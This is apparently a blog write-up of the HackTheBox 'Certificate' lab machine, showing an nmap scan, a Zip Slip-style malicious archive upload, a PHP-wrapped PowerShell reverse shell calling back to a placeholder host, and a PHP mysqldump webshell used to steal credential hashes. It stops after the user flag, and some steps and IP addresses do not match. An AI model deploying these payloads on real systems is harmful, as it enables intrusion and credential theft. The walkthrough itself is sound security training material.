xone
xone 3 months ago
xone #hackthebox

Certificate HTB Writeup | HacktheBox | Season 8

Certificate is a Hard-difficulty Windows Active Directory machine on Hack The Box that demonstrates a series of privilege escalation techniques. This walkthrough details the complete attack path from initial foothold to domain administrator access.

Machine IP: 10.10.11.70

Initial Reconnaissance

First, let's perform a comprehensive Nmap scan to identify open ports and services:

nmap -v -sCTV -p- -T4 -Pn  10.10.11.71

The scan reveals several key services running:

Not shown: 65514 filtered tcp ports (no-response)
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Apache httpd 2.4.58 (OpenSSL/3.1.3 PHP/8.0.30)
|_http-favicon: Unknown favicon MD5: FBA180716B304B231C4029637CCF6481
|_http-server-header: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Certificate | Your portal for certification
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-06-01 17:50:34Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: certificate.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.certificate.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certificate.htb
| Issuer: commonName=Certificate-LTD-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-11-04T03:14:54
| Not valid after:  2025-11-04T03:14:54
| MD5:   0252:f5f4:2869:d957:e8fa:5c19:dfc5:d8ba
|_SHA-1: 779a:97b1:d8e4:92b5:bafe:bc02:3388:45ff:dff7:6ad2
|_ssl-date: 2025-06-01T17:52:17+00:00; +27m32s from scanner time.
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: certificate.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-06-01T17:52:17+00:00; +27m32s from scanner time.
| ssl-cert: Subject: commonName=DC01.certificate.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certificate.htb
| Issuer: commonName=Certificate-LTD-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-11-04T03:14:54
| Not valid after:  2025-11-04T03:14:54
| MD5:   0252:f5f4:2869:d957:e8fa:5c19:dfc5:d8ba
|_SHA-1: 779a:97b1:d8e4:92b5:bafe:bc02:3388:45ff:dff7:6ad2
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: certificate.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-06-01T17:52:17+00:00; +27m32s from scanner time.
| ssl-cert: Subject: commonName=DC01.certificate.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certificate.htb
| Issuer: commonName=Certificate-LTD-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-11-04T03:14:54
| Not valid after:  2025-11-04T03:14:54
| MD5:   0252:f5f4:2869:d957:e8fa:5c19:dfc5:d8ba
|_SHA-1: 779a:97b1:d8e4:92b5:bafe:bc02:3388:45ff:dff7:6ad2
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: certificate.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-06-01T17:52:17+00:00; +27m32s from scanner time.
| ssl-cert: Subject: commonName=DC01.certificate.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certificate.htb
| Issuer: commonName=Certificate-LTD-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-11-04T03:14:54
| Not valid after:  2025-11-04T03:14:54
| MD5:   0252:f5f4:2869:d957:e8fa:5c19:dfc5:d8ba
|_SHA-1: 779a:97b1:d8e4:92b5:bafe:bc02:3388:45ff:dff7:6ad2
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
49667/tcp open  msrpc         Microsoft Windows RPC
49691/tcp open  msrpc         Microsoft Windows RPC
49692/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49693/tcp open  msrpc         Microsoft Windows RPC
49709/tcp open  msrpc         Microsoft Windows RPC
49715/tcp open  msrpc         Microsoft Windows RPC
49771/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows


Host script results:
|_clock-skew: mean: 27m31s, deviation: 1s, median: 27m31s
| smb2-time: 
|   date: 2025-06-01T17:51:35
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required


NSE: Script Post-scanning.
Initiating NSE at 22:54
Completed NSE at 22:54, 0.00s elapsed
Initiating NSE at 22:54
Completed NSE at 22:54, 0.00s elapsed
Initiating NSE at 22:54
Completed NSE at 22:54, 0.00s elapsed
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1167.77 seconds
                                                                  

Let's add the domain to our hosts file to make future access easier:

echo "10.10.11.71 certificate.htb" | sudo tee -a /etc/hosts

Initial Access

Step 1: Student Login

After completing the registration process, log in using the student credentials you created.

Step 2: Visit the Upload Page

Navigate to the following URL:

http://certificate.htb/upload.php?s_id=36

This page allows students to upload their assignment files. The system accepts multiple file formats, including PDFs and ZIP files.

Step 3: Exploring ZIP Upload Vulnerability – Zip Slip

While testing the upload functionality, I remembered a technique demonstrated by NahamSec on his YouTube channel called Zip Slip. This vulnerability involves uploading a malicious ZIP archive containing path traversal sequences (like ../../) to overwrite sensitive files on the server during extraction

📺 Recommendation: Watch NahamSec’s video on Zip Slip to understand how the attack works and why it's dangerous.


I decided to test for Zip Slip exploitation on this upload feature.

Step 4: Preparing the Malicious ZIP

1. Create a benign zip with a regular PDF file:

zip benign.zip legit.pdf

2. Create a reverse shell payload:

mkdir malicious_files
cd malicious_files
nano shell.php

Paste the following PowerShell reverse shell payload into shell.php:

<?php
shell_exec("powershell -nop -w hidden -c \"\$client = New-Object System.Net.Sockets.TCPClient('YOURIP',4444); \$stream = \$client.GetStream(); [byte[]]\$bytes = 0..65535|%{0}; while((\$i = \$stream.Read(\$bytes, 0, \$bytes.Length)) -ne 0){; \$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$bytes,0,\$i); \$sendback = (iex \$data 2>&1 | Out-String ); \$sendback2 = \$sendback + 'PS ' + (pwd).Path + '> '; \$sendbyte = ([text.encoding]::ASCII).GetBytes(\$sendback2); \$stream.Write(\$sendbyte,0,\$sendbyte.Length); \$stream.Flush()}; \$client.Close()\"");
?>



3. Package the malicious payload:

zip -r malicious.zip malicious_files/

4. Combine both ZIPs into a single archive:

cat benign.zip malicious.zip > combined.zip

This combined.zip file contains both a harmless PDF and the malicious PHP reverse shell. The idea is to trick the server into extracting the payload and placing it into a web-accessible location.

Step 5: Crafting a Malicious ZIP to Dump MySQL Database

Prepare a PHP file that runs mysqldump to export the database:

<?php
system('"C:\\xampp\\mysql\\bin\\mysqldump.exe" -u certificate_webapp_user -pENTER-MY-SQL-DB-PASSWORD Certificate_WEBAPP_DB > C:\\xampp\\htdocs\\certificate.htb\\static\\full_dump.sql');
?>

Save it as shell.php, then package it:

Note: you need to Enter Username and Password

Step 6: Exploiting the Upload Function

Upload the newzip.zip at:

http://certificate.htb/upload.php?s_id=36

After uploading, you’ll see a "CLICK HERE" link. Click it to navigate to the extracted file path.

Now, manually change the URL's end segment to shell.php, like this:

http://certificate.htb/extracted-path/yourfoldername/shell.php

Once accessed, this triggers the database dump into the static directory.

Step 7: Extracting Credentials

Visit the dumped SQL file:

http://certificate.htb/static/full_dump.sql

Open it in a text editor (e.g., Notepad) and search for user credentials. You should find a password hash for user Sarah.B.

Crack the hash using a tool like hashcat or john, and you’ll be able to retrieve the user flag.


Access is restricted by HackTheBox rules#
The solution to the problem can be published in the public domain after her retirement.
Look for a non-public solution to the problem in the telegram channel .


0
4.7K

Login to Post comments

Comments 0
A very comprehensive penetration testing memo

A very comprehensive penetration testing memo

defaultuser.png
lazyhacker
 2 years ago
my name is

my name is

defaultuser.png
lazyhacker
 2 years ago
Understanding API Authentication: A Guide to Cookie-Based,jwt

Understanding API Authentication: A Guide to Cookie-Based,jwt

defaultuser.png
X0NE
 2 years ago
API Basics: Understanding SOAP vs. REST, URLs

API Basics: Understanding SOAP vs. REST, URLs

defaultuser.png
X0NE
 2 years ago
Google AI Security Framework SAIF detailed explanation

Google AI Security Framework SAIF detailed explanation

https://lh3.googleusercontent.com/a/ACg8ocIkM8EGIx0gz9GUP_nM6_sMxivr6876Wp0e9MAp6mGc=s96-c
xone
 5 months ago